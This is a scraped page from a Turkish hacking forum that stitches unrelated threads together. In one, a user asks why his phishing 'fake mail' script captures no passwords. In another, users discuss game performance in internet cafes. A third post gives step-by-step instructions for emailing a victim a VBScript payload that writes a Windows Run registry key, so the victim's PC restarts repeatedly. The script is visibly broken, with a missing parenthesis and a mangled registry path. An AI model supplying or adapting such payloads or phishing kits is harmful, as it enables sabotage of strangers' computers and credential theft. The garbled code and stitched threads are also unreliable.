Fake Mail hata

whitepoet

Yeni üye
14 Mar 2009
4
0
Arkadaşlar bu fake mailde ben ne hatası yapıyorum ne ettiysem denemelik yazdığım hiç bir şifre gelmedi.
siteden çalışıyor yorumları olan scriptlerden biri bu.

Oturum Aç

facehacker

Katılımcı Üye
10 Nis 2012
274
0
İstanbul
internet kafede nasıl oluyor

merhaba arkadaşlar benm bi sornm var.bilgisayarıma geçen gta 4 yükledm ama cok yavaş oldu 2 gb ddr3 ram 1 gb ekran kartı bu neden bende cok yavaş oluyorda internet kafedeki bilgisayarlarda hızlı acılabiliyor kullandıkları bi programı bilen varsa lütfen söyleyebilirmi

_Lucass_

Katılımcı Üye
13 Şub 2012
671
0
Akın softla alakası yok genelde internet cafedeki bilgisayarın özellikleri seninle aynı olabilir ama işlemcileri yüksektir en kötü işlemci 2.90ghz dir internet cafelerde buda doğal olarak oyunları hızlı çalıştırır. bide işletim sistemide önemlidir. oyun için yüksek performans arıyorsan xp kullanmalısın..

Majardoma

Katılımcı Üye
9 Tem 2012
372
0
genelde int. cafelerde ghost işletim sistemi kullanılır bu yüzden hafif ve stabildir bu yüzden arka planda sadece 5-10 tane program çalışır seninki ise direckt kurulum oldugundan arka planında 40-50 tane program çalışmaktadır hangisini karşılasın ramın :D

paracelsus

Katılımcı Üye
24 Şub 2012
994
0
[Bilinmiyor]
mail ile pc hack

maille pc ye dalma
Hotmaile gir yeni mesaj yarata
gir.Kime bölümüne kurbanın mail
adresini yaz.
konuya ilgi çekici bişey yaz.
mesaj bölümüne de mesajıı yaz
ve sonra alttaki kodu ekle
Kod:
******** language="vbscript">
on error resume next
dim kutluk
set kutluk=CreateObject
("WScript.Shell"
kutluk.RegWrite
"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur
rent
VersionRunSYSTEM32","shutdown
-r"
</script>
hacker by RealisTick
bu kod gönderdiğin kişinin maili
açmasıyla gönderdiğim kodlar
devreye girecek ne işe yarar
diye sorucaksın tabi gönderdiğin
kişinin pc'yi yeniden
başlatmasıyla yada pc yi
açtığında sistem uyarısı gelecek
ve tüm uygulamanızı kapatın
diyecek
yani pc her açıldığında 24
saniyede bir kapanacak olay bu.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.